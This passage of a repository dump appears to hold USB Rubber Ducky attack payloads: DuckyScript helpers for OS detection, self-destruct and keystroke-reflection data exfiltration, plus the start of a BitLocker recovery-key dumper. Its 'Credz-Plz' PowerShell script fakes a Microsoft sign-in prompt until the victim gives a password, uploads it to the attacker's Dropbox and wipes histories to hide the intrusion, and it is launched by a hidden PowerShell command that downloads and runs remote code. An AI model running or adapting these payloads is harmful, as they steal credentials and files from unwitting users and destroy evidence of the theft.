STRING prediction: MacOS\n END_IF_DEFINED\n $_OS = MACOS\n END_IF\n ELSE IF ($_OS == WINDOWS) THEN\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING Confident Windows Prediction\n END_IF_DEFINED\n $_OS = WINDOWS\n END_IF\n END_IF_DEFINED\n\n RESTORE_HOST_KEYBOARD_LOCK_STATE\n\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING OS_DETECT complete\n ENTER\n END_IF_DEFINED\n END_FUNCTION\n\n REM Uncomment the function call below to run this extension inline (here)\n REM or call DETECT_OS() anywhere in your payload after the extension\n REM DETECT_OS()\nEND_EXTENSION\n" }, { "path": "payloads/extensions/passive_detect_ready.txt", "content": "EXTENSION PASSIVE_DETECT_READY\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Passive Detect Ready - no injection dynamic boot delay\n for hosts that reflect current OS lock key state on connect\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\nEND_EXTENSION\n" }, { "path": "payloads/extensions/passive_windows_detect.txt", "content": "EXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n" }, { "path": "payloads/extensions/protected_storage_mode.txt", "content": "EXTENSION PROTECTED_STORAGE_MODE\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK\n Example hidden storage mode\n Forces user to padlock style unlock storage mode by setting\n the HOSTs lock keys and pressing the duck button to submit a\n combination three times.\n The wrong combination will immediately fail silently.\n The correct combination will trigger ATTACKMODE STORAGE and LED_G\n\n TARGET:\n Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK\n\n USAGE:\n BUTTON_DEF\n STORAGE_PASSWORD_CHECK()\n END_BUTTON\n\n CONFIGURATION:\n Available combinations provided as DEFINEs below,\n change within the STORAGE_PASSWORD_CHECK as desired\n\n Method of input submission can be changed using SUBMIT_FOR_CHECK\n But will obviously convolute combination checks.\n END_REM\n\n REM Combinations provided as defines for convenience (verbosely spaced - DEFINES aren't re-formatted by preprocessor)\n DEFINE #ALL_LOCKS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )\n DEFINE #ALL_LOCKS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )\n\n DEFINE #ONLY_CAPS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )\n DEFINE #ONLY_NUM_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )\n DEFINE #ONLY_SCROLL_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )\n\n DEFINE #ONLY_CAPS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == TRUE ) )\n DEFINE #ONLY_NUM_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )\n DEFINE #ONLY_SCROLL_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )\n\n DEFINE #SUBMIT_FOR_CHECK WAIT_FOR_BUTTON_PRESS\n \n FUNCTION STORAGE_PASSWORD_CHECK()\n VAR $ACCEPED = FALSE\n LED_R\n #SUBMIT_FOR_CHECK\n\n REM first combination ALL LOCKS OFF\n IF #ALL_LOCKS_OFF THEN\n STRING .\n #SUBMIT_FOR_CHECK\n\n REM second combination ONLY CAPS ON \n IF #ONLY_CAPS_ON THEN\n STRING .\n #SUBMIT_FOR_CHECK\n\n REM third combination ONLY NUM ON \n IF #ONLY_NUM_ON THEN\n $ACCEPTED = TRUE\n END_IF\n END_IF\n END_IF\n\n IF $ACCEPTED THEN\n LED_G\n ATTACKMODE STORAGE\n END_IF\n END_FUNCTION\nEND_EXTENSION\n" }, { "path": "payloads/extensions/self_destruct.txt", "content": "EXTENSION SELF_DESTRUCT\n REM VERSION 1.0\n REM AUTHOR: Korben\n\n REM_BLOCK Documentation\n This extension is used to \"SELF DESTRUCT\" a payload in one of two ways\n\n TARGET: \n Any\n\n USAGE:\n Place this extension at top of your payload.\n\n\n CONFIGURATION:\n Set the #DESTRUCT_METHOD to one of the following methods:\n REVERT_TO_THUMBDRIVE() \n - delete payload and enter storage mode.\n To return to normal usage simply add a new inject.bin\n \n SOFT_BRICK() \n - keeps payload in order to force OFF w/ disabled button.\n To return to normal usage the SD card will need to be removed and\n the inject.bin replaced.\n \n Set #RUNS_BEFORE_DESTROY to an integer - the number of times the payload \n must run before it self destructs\n \n #REQUIRES_FINISH if set to TRUE will require you to call PAYLOAD_FINISHED()\n at the end of the payload for the deployment to count towards #RUNS_BEFORE_DESTROY\n \n Since this extension replaces \"boot\", #BOOT_ATTACKMODE defines the\n the default mode to enter after this extension has run\n END_REM\n DEFINE #REQUIRES_FINISH FALSE\n DEFINE #RUNS_BEFORE_DESTROY 1\n DEFINE #DESTRUCT_METHOD REVERT_TO_THUMBDRIVE()\n DEFINE #BOOT_ATTACKMODE ATTACKMODE HID\n\n ATTACKMODE OFF\n \n FUNCTION PERSIST()\n REM_BLOCK note\n this takes advantage of a sideaffect of hide/restore procedure and\n _how_ we initialize the variable we want to persist.\n END_REM\n HIDE_PAYLOAD\n DELAY 100\n RESTORE_PAYLOAD\n END_FUNCTION\n \n FUNCTION SOFT_BRICK()\n ATTACKMODE OFF\n LED_OFF\n DISABLE_BUTTON\n STOP_PAYLOAD\n END_FUNCTION\n\n FUNCTION REVERT_TO_THUMBDRIVE()\n LED_OFF\n HIDE_PAYLOAD\n DELAY 500\n ATTACKMODE STORAGE\n END_FUNCTION\n \n FUNCTION PAYLOAD_FINISHED()\n $TIMES_RAN = ($TIMES_RAN + 1)\n PERSIST()\n IF ($TIMES_RAN < #RUNS_BEFORE_DESTROY) THEN\n #DESTRUCT_METHOD\n END_IF\n END_FUNCTION\n\n IF ($TIMES_RAN < #RUNS_BEFORE_DESTROY) THEN\n IF_NOT_DEFINED_TRUE #REQUIRES_FINISH\n VAR $TIMES_RAN = ($TIMES_RAN + 1)\n PERSIST()\n END_IF_DEFINED\n #BOOT_ATTACKMODE\n ELSE\n #DESTRUCT_METHOD\n END_IF\nEND_EXTENSION\n" }, { "path": "payloads/extensions/translate.txt", "content": "EXTENSION TRANSLATE\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n This extension acts as a library or collection of helper functions\n to work with converting variables in your payloads.\n WHY:\n Of the many ways to get information about the state of your payload\n is by injecting static strings effectively as debugging prints\n However, given the non-static nature of payloads using variables in\n DuckyScript 3.0 - the ability to decode variables during payload\n execution and print (inject) representations of their current state\n can often be a critically helpful development and debugging tool.\n\n Available Functions:\n DEFAULT:\n TRANSLATE_INT() - var to decimal string - set $INPUT prior to call\n EXTENDED: (enabled using the #INCLUDE defines below):\n TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call\n TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call\n TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call\n\n USAGE:\n set $INPUT to desired var\n call the correct translate_ function for the expected data type e.g.\n VAR $myVar = 1234\n $INPUT = $myVar\n TRANSLATE_INT()\n REM the above code will inject 1234\n END_REM\n\n REM CONFIGURATION:\n DEFINE #INCLUDE_TRANSLATE_HEX FALSE\n DEFINE #INCLUDE_TRANSLATE_BOOL FALSE\n DEFINE #INCLUDE_TRANSLATE_BINARY FALSE\n DEFINE #INCLUDE_SWAP_ENDIAN FALSE\n\n REM Append ENTER after translation\n VAR $AS_STRINGLN = TRUE\n\n DEFINE #PRINT_INT 0\n DEFINE #PRINT_HEX 1\n VAR $DIGIT_PRINT_MODE = #PRINT_INT\n VAR $D = 0\n VAR $IN = 0\n VAR $INPUT = 0\n VAR $MOD = 0\n VAR $P = FALSE\n\n REM REQUIRED for INT/HEX - convert int to char\n FUNCTION PRINTDIGIT()\n IF ($D == 0) THEN\n STRING 0\n ELSE IF ($D == 1) THEN\n STRING 1\n ELSE IF ($D == 2) THEN\n STRING 2\n ELSE IF ($D == 3) THEN\n STRING 3\n ELSE IF ($D == 4) THEN\n STRING 4\n ELSE IF ($D == 5) THEN\n STRING 5\n ELSE IF ($D == 6) THEN\n STRING 6\n ELSE IF ($D == 7) THEN\n STRING 7\n ELSE IF ($D == 8) THEN\n STRING 8\n ELSE IF ($D == 9) THEN\n STRING 9\n IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX\n ELSE IF ($DIGIT_PRINT_MODE == #PRINT_HEX) THEN\n IF ($D == 10) THEN\n STRING A\n ELSE IF ($D == 11) THEN\n STRING B\n ELSE IF ($D == 12) THEN\n STRING C\n ELSE IF ($D == 13) THEN\n STRING D\n ELSE IF ($D == 14) THEN\n STRING E\n ELSE IF ($D == 15) THEN\n STRING F\n END_IF\n END_IF_DEFINED\n ELSE\n STRING ?\n END_IF\n END_FUNCTION\n\n REM REQUIRED for INT/HEX- consumes a character / place from the input\n FUNCTION CONSUME()\n $D = 0\n WHILE ($INPUT >= $MOD)\n $D = ($D + 1)\n $INPUT = ($INPUT - $MOD)\n END_WHILE\n IF (($D > 0) || ($P == TRUE)) THEN\n $P = TRUE\n PRINTDIGIT()\n END_IF\n END_FUNCTION\n\n IF_DEFINED_TRUE #INCLUDE_SWAP_ENDIAN\n REM ENDIAN SWAPPER helper, (useful for working with VID/PID)\n FUNCTION SWAP_ENDIAN()\n $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))\n END_FUNCTION\n END_IF_DEFINED\n\n\n REM Translates a variable of presumed integer type and attempts to convert\n REM and inject a DECIMAL string representation\n FUNCTION TRANSLATE_INT() \n $DIGIT_PRINT_MODE = #PRINT_INT\n $P = FALSE\n IF ( $INPUT >= 10000) THEN\n $MOD = 10000\n CONSUME()\n END_IF\n IF (($INPUT >= 1000) || ($P == TRUE)) THEN\n $MOD = 1000\n CONSUME()\n END_IF\n IF (($INPUT >= 100) || ($P == TRUE)) THEN\n $MOD = 100\n CONSUME()\n END_IF\n IF (($INPUT >= 10) || ($P == TRUE)) THEN\n $MOD = 10\n CONSUME()\n END_IF()\n $D = $INPUT\n PRINTDIGIT()\n IF $AS_STRINGLN THEN\n ENTER\n END_IF\n END_FUNCTION\n\n REM Translates a variable of presumed boolean type and attempts to convert\n REM and inject a BOOLEAN string representation\n REM TO ENABLE SET INCLUDE_TRANSLATE_BOOL to TRUE before compiling\n IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BOOL\n FUNCTION TRANSLATE_BOOL()\n IF $INPUT THEN\n STRING TRUE\n ELSE\n STRING FALSE\n END_IF\n IF $AS_STRINGLN THEN\n ENTER\n END_IF\n END_FUNCTION\n END_IF_DEFINED\n\n REM Translates a variable of presumed integer type and attempts to convert\n REM and inject a HEX string representation\n REM TO ENABLE SET INCLUDE_TRANSLATE_HEX to TRUE before compiling\n IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX\n FUNCTION TRANSLATE_HEX()\n $DIGIT_PRINT_MODE = #PRINT_HEX\n VAR $chars = 0\n VAR $d1 = 0\n VAR $d2 = 0\n VAR $d3 = 0\n VAR $d4 = 0\n WHILE ($INPUT > 0)\n IF ($chars == 0) THEN\n $d1 = ($INPUT % 16)\n ELSE IF ($chars == 1) THEN\n $d2 = ($INPUT % 16)\n ELSE IF ($chars == 2) THEN\n $d3 = ($INPUT % 16)\n ELSE IF ($chars == 3) THEN\n $d4 = ($INPUT % 16)\n END_IF\n $chars = ($chars + 1)\n $INPUT = ($INPUT / 16)\n END_WHILE\n VAR $i = 0\n STRING 0x\n IF ($chars == 0) THEN\n STRING 0x0000\n ELSE IF ($chars == 1) THEN\n STRING 000\n $D = $d1\n PRINTDIGIT()\n ELSE IF ($chars == 2) THEN\n STRING 00\n $D = $d2\n PRINTDIGIT()\n $D = $d1\n PRINTDIGIT()\n ELSE IF ($chars == 3) THEN\n STRING 0\n $D = $d3\n PRINTDIGIT()\n $D = $d2\n PRINTDIGIT()\n $D = $d1\n PRINTDIGIT()\n ELSE IF ($chars == 4) THEN\n STRING 0\n $D = $d4\n PRINTDIGIT()\n $D = $d3\n PRINTDIGIT()\n $D = $d2\n PRINTDIGIT()\n $D = $d1\n PRINTDIGIT()\n END_IF\n IF $AS_STRINGLN THEN\n ENTER\n END_IF\n END_FUNCTION\n END_IF_DEFINED\n\n REM Translates a variable of presumed integer type and attempts to convert\n REM and inject a BINARY string representation\n REM TO ENABLE SET INCLUDE_TRANSLATE_BINARY to TRUE before compiling\n IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BINARY\n FUNCTION TRANSLATE_BINARY()\n VAR $I = 16\n WHILE ( $I > 0 )\n $I = ($I - 1)\n IF (($INPUT & 0x8000) == 0 ) THEN\n STRING 0\n ELSE\n STRING 1\n END_IF\n $INPUT = ($INPUT << 1)\n END_WHILE\n IF $AS_STRINGLN THEN\n ENTER\n END_IF\n END_FUNCTION\n END_IF_DEFINED\nEND_EXTENSION\n" }, { "path": "payloads/extensions/windows_hid_exfil.txt", "content": "EXTENSION WINDOWS_HID_EXFIL\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Helpers for Keystroke Reflection data exfiltration\n This payload is a proof of concept for USB HID only Data Exfiltration\n\n TARGET:\n Windows Host that supports powershell and SendKeys\n\n USAGE:\n Prepare data to exfil (in filename defined by TARGET_FILE below)\n with a powershell window already open - call RUN_WINDOWS_EXFIL()\n\n DEPLOYMENT:\n Plug Ducky into host, wait for the LED to turn (and stay) solid green.\n END_REM\n\n REM CONFIGURATION:\n REM File on host machine to exfil\n DEFINE #TARGET_FILE filename.txt\n\n DEFINE #SAVE_AND_RESTORE_LOCKS TRUE\n DEFINE #ENABLE_EXFIL_LEDS TRUE\n DEFINE #CLOSE_AFTER_EXFIL TRUE\n\n DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE\n\n FUNCTION RUN_WINDOWS_EXFIL()\n IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS\n SAVE_HOST_KEYBOARD_LOCK_STATE\n END_IF_DEFINED\n\n IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS\n LED_OFF\n $_EXFIL_LEDS_ENABLED = TRUE\n END_IF_DEFINED\n\n $_EXFIL_MODE_ENABLED = TRUE\n STRING_POWERSHELL\n foreach($b in $(Get-Content \"#TARGET_FILE\" -Encoding byte)){\n foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){\n If($b -band $a){\n $o+=\"%{NUMLOCK}\"\n }Else{\n $o+=\"%{CAPSLOCK}\"\n }\n }\n };\n $o+=\"%{SCROLLLOCK}\";\n Add-Type -Assembly System.Windows.Forms;\n [System.Windows.Forms.SendKeys]::SendWait(\"$o\");\n END_STRING\n IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL\n STRING exit;\n END_IF_DEFINED\n\n ENTER\n\n REM Listen for EOF\n WAIT_FOR_SCROLL_CHANGE\n $_EXFIL_MODE_ENABLED = FALSE\n\n IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS\n LED_G\n END_IF_DEFINED\n\n IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS\n RESTORE_HOST_KEYBOARD_LOCK_STATE\n END_IF_DEFINED\n END_FUNCTION\n\n IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO\n REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.\n REM DEMO Boot Delay\n DELAY 3000\n REM Open run dialog\n GUI r\n DELAY 500\n REM Open Powershell\n STRINGLN powershell\n DELAY 500\n REM Prepare some data in TARGET_FILE\n STRINGLN echo test123 > #TARGET_FILE\n DELAY 500\n REM Exfil data to USB Rubber Ducky using Keystroke Reflection\n RUN_WINDOWS_EXFIL()\n END_IF_DEFINED\nEND_EXTENSION\n" }, { "path": "payloads/library/credentials/-RD-Credz-Plz/Credz-Plz-Execute.txt", "content": "REM Title: Credz-Plz\n\nREM Author: I am Jakoby\n\nREM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details.\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\nENTER\n\nREM Remember to replace the link with your DropBox shared link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\n" }, { "path": "payloads/library/credentials/-RD-Credz-Plz/Credz-Plz.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Credentials | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 7,10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n\n<#\n.SYNOPSIS\n\tThis script is meant to trick your target into sharing their credentials through a fake authentication pop up message\n\n.DESCRIPTION \n\tA pop up box will let the target know \"Unusual sign-in. Please authenticate your Microsoft Account\"\n\tThis will be followed by a fake authentication ui prompt. \n\tIf the target tried to \"X\" out, hit \"CANCEL\" or while the password box is empty hit \"OK\" the prompt will continuously re pop up \n\tOnce the target enters their credentials their information will be uploaded to your dropbox for collection\n\n.Link\n\thttps://developers.dropbox.com/oauth-guide\t\t# Guide for setting up your DropBox for uploads\n\n#>\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n$DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n$FileName = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt\"\n \n#------------------------------------------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to generate the ui.prompt you will use to harvest their credentials\n#>\n\nfunction Get-Creds {\ndo{\n$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password\n if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {\n [System.Windows.Forms.MessageBox]::Show(\"Credentials can not be empty!\")\n Get-Creds\n}\n$creds = $cred.GetNetworkCredential() | fl\nreturn $creds\n # ...\n\n $done = $true\n} until ($done)\n\n}\n\n#----------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to pause the script until a mouse movement is detected\n#>\n\nfunction Pause-Script{\nAdd-Type -AssemblyName System.Windows.Forms\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n$o=New-Object -ComObject WScript.Shell\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\n}\n\n#----------------------------------------------------------------------------------------------------\n\n# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off \n\nfunction Caps-Off {\nAdd-Type -AssemblyName System.Windows.Forms\n$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')\n\n#If true, toggle CapsLock key, to ensure that the script doesn't fail\nif ($caps -eq $true){\n\n$key = New-Object -ComObject WScript.Shell\n$key.SendKeys('{CapsLock}')\n}\n}\n#----------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to call the function to pause the script until a mouse movement is detected then activate the pop-up\n#>\n\nPause-Script\n\nCaps-Off\n\nAdd-Type -AssemblyName System.Windows.Forms\n\n[System.Windows.Forms.MessageBox]::Show(\"Unusual sign-in. Please authenticate your Microsoft Account\")\n\n$creds = Get-Creds\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to save the gathered credentials to a file in the temp directory\n#>\n\necho $creds >> $env:TMP\\$FileName\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to upload your files to dropbox\n#>\n\n$TargetFilePath=\"/$FileName\"\n$SourceFilePath=\"$env:TMP\\$FileName\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $DropBoxAccessToken\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to clean up behind you and remove any evidence to prove you were there\n#>\n\n# Delete contents of Temp folder \n\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# Delete run box history\n\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\n\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Deletes contents of recycle bin\n\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n" }, { "path": "payloads/library/credentials/-RD-Credz-Plz/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Credz-Plz\n\nA script used to prompt the target to enter their creds to later be exfiltrated with dropbox.\n\n## Description\n\nA pop up box will let the target know \"Unusual sign-in. Please authenticate your Microsoft Account\"\nThis will be followed by a fake authentication ui prompt. \nIf the target tried to \"X\" out, hit \"CANCEL\" or while the password box is empty hit \"OK\" the prompt will continuously re pop up \nOnce the target enters their credentials their information will be uploaded to your dropbox for collection \n\n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)\n\n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

I am Jakoby

\n


\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)\n

\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "payloads/library/credentials/BitLockerKeyDump/payload.txt", "content": "REM BitLockerKeyDump\r\nREM Version 1.0\r\nREM OS: Windows\r\nREM Author: 0i41E\r\nREM Requirement: DuckyScript 3.0\r\nREM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection\r\n\r\nREM Extension made by Korben for checking if Target is Windows OS\r\nEXTENSION EXTENSION PASSIVE_WINDOWS_DETECT\r\n REM VERSION 1.1\r\n REM AUTHOR: Korben\r\n\r\n REM_BLOCK DOCUMENTATION\r\n Windows fully passive OS Detection and passive Detect Ready\r\n Includes its own passive detect ready.\r\n Does not require additional extensions.\r\n\r\n USAGE:\r\n Extension runs inline (here)\r\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\r\n boot delay\r\n $_OS will be set to WINDOWS or NOT_WINDOWS\r\n See end of payload for usage within payload\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n DEFINE #MAX_WAIT 150\r\n DEFINE #CHECK_INTERVAL 20\r\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\r\n DEFINE #NOT_WINDOWS 7\r\n\r\n $_OS = #NOT_WINDOWS\r\n\r\n VAR $MAX_TRIES = #MAX_WAIT\r\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\r\n DELAY #CHECK_INTERVAL\r\n $MAX_TRIES = ($MAX_TRIES - 1)\r\n END_WHILE\r\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\r\n $_OS = WINDOWS\r\n END_IF\r\n\r\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\r\n IF ($_OS == WINDOWS) THEN\r\n STRING HELLO WINDOWS!\r\n ELSE\r\n STRING HELLO WORLD!\r\n END_IF\r\n END_REM\r\nEND_EXTENSION\r\n\r\nREM Extension made by 0i41E to signalize the payloads end\r\nEXTENSION DETECT_FINISHED\r\n REM VERSION 1.0\r\n REM AUTHOR: 0i41E\r\n\r\n REM_BLOCK DOCUMENTATION\r\n USAGE:\r\n Use the function Detect_Finished() to signal the finished execution of your payload.\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n DEFINE #PAUSE 150\r\n FUNCTION Detect_Finished()\r\n IF ($_CAPSLOCK_ON == FALSE)\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n ATTACKMODE OFF\r\n ELSE IF\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n ATTACKMODE OFF\r\n END_IF\r\n END_FUNCTION\r\nEND_EXTENSION\r\n\r\nREM Extension made by 0i41E for fileless exfiltration via Lock Keys\r\nEXTENSION WINDOWS_FILELESS_HID_EXFIL\r\n REM VERSION 1.0\r\n REM AUTHOR: 0i41E\r\n\r\n REM_BLOCK DOCUMENTATION\r\n Extension for Keystroke Reflection data exfiltration without putting files on disk.\r\n This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original 